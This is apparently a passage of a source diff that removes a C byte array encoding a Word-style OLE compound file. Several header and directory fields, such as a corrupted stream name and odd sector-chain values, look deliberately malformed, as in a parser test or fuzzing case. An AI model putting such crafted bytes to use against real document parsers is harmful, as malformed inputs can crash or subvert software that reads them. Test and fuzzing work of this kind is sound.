-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7c\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00"
-"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
-"\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
-"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
-"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
-"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00"
-"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
-"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
-"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00"
-"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00"
-"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00"
-"\x2d\x00\x00\x00\x2e\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00"
-"\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00\x00\x00\x34\x00\x00\x00"
-"\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00"
-"\x39\x00\x00\x00\x3a\x00\x00\x00\x3b\x00\x00\x00\x3c\x00\x00\x00"
-"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00"
-"\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00"
-"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00"
-"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00"
-"\x4d\x00\x00\x00\x4e\x00\x00\x00\x4f\x00\x00\x00\x50\x00\x00\x00"
-"\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00"
-"\x55\x00\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00\x58\x00\x00\x00"
-"\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00\x5c\x00\x00\x00"
-"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00"
-"\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00\x64\x00\x00\x00"
-"\x65\x00\x00\x00\x66\x00\x00\x00\x67\x00\x00\x00\x68\x00\x00\x00"
-"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00"
-"\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00\x70\x00\x00\x00"
-"\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00"
-"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00"
-"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00"
-"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00"
-"\x81\x00\x00\x00\xfe\xff\xff\xff\x83\x00\x00\x00\x84\x00\x00\x00"
-"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00"
-"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00"
-"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00"
-"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\xfe\xff\xff\xff"
-"\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00"
-"\x99\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00"
-"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00"
-"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00"
-"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00"
-"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00"
-"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00"
-"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00"
-"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00"
-"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00"
-"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00"
-"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00"
-"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xc8\x00\x00\x00"
-"\x94\x00\x00\x00\xca\x00\x00\x00\xcb\x00\x00\x00\xfe\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xd5\x00\x00\x00\xd6\x00\x00\x00\xd7\x00\x00\x00\xd8\x00\x00\x00"
-"\xd9\x00\x00\x00\xda\x00\x00\x00\xdb\x00\x00\x00\xfe\xff\xff\xff"
-"\xfd\xff\xff\xff\xfd\xff\xff\xff\xdf\x00\x00\x00\xfe\xff\xff\xff"
-"\xfe\xff\xff\xff\xe2\x00\x00\x00\xfe\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
-"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x16\x00\x05\x6d\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00"
-"\x06\x09\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x53\x3f\x53"
-"\x31\x1d\xc6\x01\xe1\x00\x00\x00\x40\x02\x00\x00\x00\x00\x00\x00"
-"\x44\x00\x61\x00\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x0a\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x82\x00\x00\x00\x2c\x22\x00\x00\x00\x00\x00\x00"
-"\x31\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x0e\x00\x02\x01\x01\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x94\x00\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00"
-"\x57\x6f\x6f\x6f\x72\x72\x64\x00\x44\x00\x6f\x00\x63\x00\x75\x00"
-"\x6d\x00\x65\x00\x6e\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x1a\x00\x02\x01\x02\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x29\x02\x01\x00\x00\x00\x00\x00"
-"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
-"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
-"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x02\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00"
-"\x05\x00\x44\x00\x6f\x00\x63\x00\x75\x00\x6d\x00\x65\x00\x6e\x00"
-"\x74\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
-"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
-"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x38\x00\x02\x01\x04\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xf0"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xd4\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-;
-char file_part9[]=
